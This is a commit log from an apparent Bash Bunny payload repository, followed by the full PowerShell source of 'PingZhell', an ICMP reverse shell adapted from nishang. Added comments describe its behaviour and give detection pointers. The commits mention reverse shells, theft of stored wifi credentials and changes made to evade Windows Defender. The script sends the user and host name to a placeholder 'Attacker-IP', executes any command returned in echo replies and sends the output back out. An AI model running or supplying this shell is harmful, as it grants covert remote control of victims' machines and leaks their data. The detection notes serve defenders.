* Uploaded ReverseBunny
Obfuscated reverse shell via powershell
* Uploaded WifiSnatch
Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away 🐇
* Update ReverseBunny.txt
Changed payload to evade Windows Defender
* Update payload.txt
Added new "Eject Method" - props to Night(9o3)
* Update README.md
* Deleted ReverseBunny.txt
Deleted because of higher risk to get caught by AV
* Updated ReverseBunny to version 1.2
Updated ReverseBunny to version 1.2.
- Deleted payload on disk because of AV
- Added custom shell design
* Updated ReverseBunny to version 1.2
Updated README for ReverseBunny update
* Updated payload
fixed some stupid left overs <3
* Uploaded pingUinBunny
a reverse shell using icmp
* Delete payloads/library/remote_access/switch1 directory
* Uploaded pingUinBunny
A reverse shell using icmp
* Update README.md
* Update README.md
* Updated to PingZhell
* Update Bunny.pl
* Update README.md
* Update README.md
* Update payload.txt
* Rename payloads/library/remote_access/pingUinBunny/Bunny.pl to payloads/library/remote_access/PingZhellBunny/Bunny.pl
* Rename payloads/library/remote_access/pingUinBunny/PingZhell.ps1 to payloads/library/remote_access/PingZhellBunny/PingZhell.ps1
* Rename payloads/library/remote_access/pingUinBunny/README.md to payloads/library/remote_access/PingZhellBunny/README.md
* Rename payloads/library/remote_access/pingUinBunny/payload.txt to payloads/library/remote_access/PingZhellBunny/payload.txt
* Update payload.txt
* Update README.md
* Update README.md
* Update Bunny.pl
<#

Original script by nishang - modified by 0iphor13 for PingZhell

Use bunny.pl as a master

When running the master, don't forget to disable ICMP replies by the OS. For example:
$: sysctl -w net.ipv4.icmp_echo_ignore_all=1
Then:
$: perl bunny.pl

Microsoft please don't block, oh dear microsoft corporation

#>

# Review notes (what the code below visibly does):
#  - Every exchange is an ICMP echo request sent with System.Net.NetworkInformation.Ping
#    to $IPAddress; the data field of the echo reply is treated as a command string.
#  - That string is passed to Invoke-Expression with no authentication or integrity
#    check, so whoever answers the echo request decides what runs, with the rights
#    of the account running this script.
#  - The banner (user and computer name), a "PS <path>> " prompt and all command
#    output leave the host as ASCII text inside echo-request payloads.
# Detection and mitigation pointers:
#  - Echo requests whose payload is readable text, or empty-payload echo requests
#    repeating every $Delay seconds to one destination, do not match ordinary
#    operating-system ping traffic and can be flagged by payload/size inspection.
#  - PowerShell script block logging and AMSI (where enabled) record the
#    Invoke-Expression call and the text it evaluates; blocking outbound ICMP from
#    hosts that do not need it removes the channel.


# Destination of every echo request (placeholder string on this page).
$IPAddress = 'Attacker-IP'
# Seconds to sleep after a reply that carried no data (see the final else branch).
$Delay = 5
# Maximum number of output bytes placed in one echo-request payload.
$BufferSize = 128

#Basic structure from http://stackoverflow.com/questions/20019053/sending-back-custom-icmp-echo-response
$ICMPClientsWalkinDownTheStreet = New-Object System.Net.NetworkInformation.Ping
$PingOptions = New-Object System.Net.NetworkInformation.PingOptions
# Don't-fragment is set on every packet; presumably this is why output is split
# into $BufferSize pieces by the script itself further down - confirm.
$PingOptions.DontFragment = $True
# Expandable here-string: $env:username and $env:computername are substituted, so the
# first packet discloses the account name and host name. The spacing of the ASCII art
# is shown as it appears on this page and may have been collapsed by extraction.
$MicrosoftCopyright =@"
_______ ___ __ _ _______ _______ __ __ _______ ___ ___
| | | | | | | | | | | | | | |
| _ | | |_| | ___|____ | |_| | ___| | | |
| |_| | | | | __ ____| | | |___| | | |
| ___| | _ | || | ______| | ___| |___| |___
| | | | | | | |_| | |_____| _ | |___| | |
|___| |___|_| |__|_______|_______|__| |__|_______|_______|_______|


Windows PowerShell running as user $env:username on $env:computername `n
"@;

# Copyright Copies Right
# Send the banner as the payload of one echo request. The second argument to Send is
# the timeout in milliseconds (60 * 1000 = 60 s); the reply is discarded.
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($MicrosoftCopyright)
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null

#Does a german penguin just PingUin?
# Send the initial prompt, built from the current working directory.
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '> ')
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null

# Polling loop with no exit condition: runs until the process is terminated.
while ($true)
{
    # Poll with an empty payload and keep the reply object this time.
    $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('')
    $reply = $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions)

    # A conforming echo reply would mirror the (empty) request payload, so a non-empty
    # buffer means the responder inserted data of its own.
    if ($reply.Buffer)
    {
        # SECURITY: the reply bytes are decoded as ASCII and evaluated as PowerShell.
        # Nothing here verifies who sent the reply or what it contains. Errors are
        # merged into the output (2>&1) and the whole result is rendered as one string.
        $response = ([text.encoding]::ASCII).GetString($reply.Buffer)
        $result = (Invoke-Expression -Command $response 2>&1 | Out-String )
        $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result)
        # Number of complete $BufferSize-byte chunks in the output; $i counts chunks sent.
        $index = [math]::floor($NeverGonnaGiveYouUp.length/$BufferSize)
        $i = 0

        #Fragment larger output into smaller ones to send to the server.
        if ($NeverGonnaGiveYouUp.length -gt $BufferSize)
        {
            while ($i -lt $index )
            {
                # Slice chunk $i and send it; the timeout on these sends is
                # 60 * 10000 ms (600 s), unlike the 60 * 1000 used elsewhere.
                $NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)]
                $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null
                $i +=1
            }
            # Bytes left over after the full chunks, sent as one final shorter payload.
            $remainingindex = $NeverGonnaGiveYouUp.Length % $BufferSize
            if ($remainingindex -ne 0)
            {
                $NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)]
                $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null
            }
        }
        else
        {
            # Output fits in a single payload.
            $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
        }
        # Follow the output with a fresh prompt reflecting the current directory.
        $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nPS " + (Get-Location).Path + '> ')
        $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
    }
    else
    {
        # No data in the reply: wait $Delay seconds before polling again. This gives
        # the idle traffic a fixed cadence that network monitoring can key on.
        Start-Sleep -Seconds $Delay
    }
}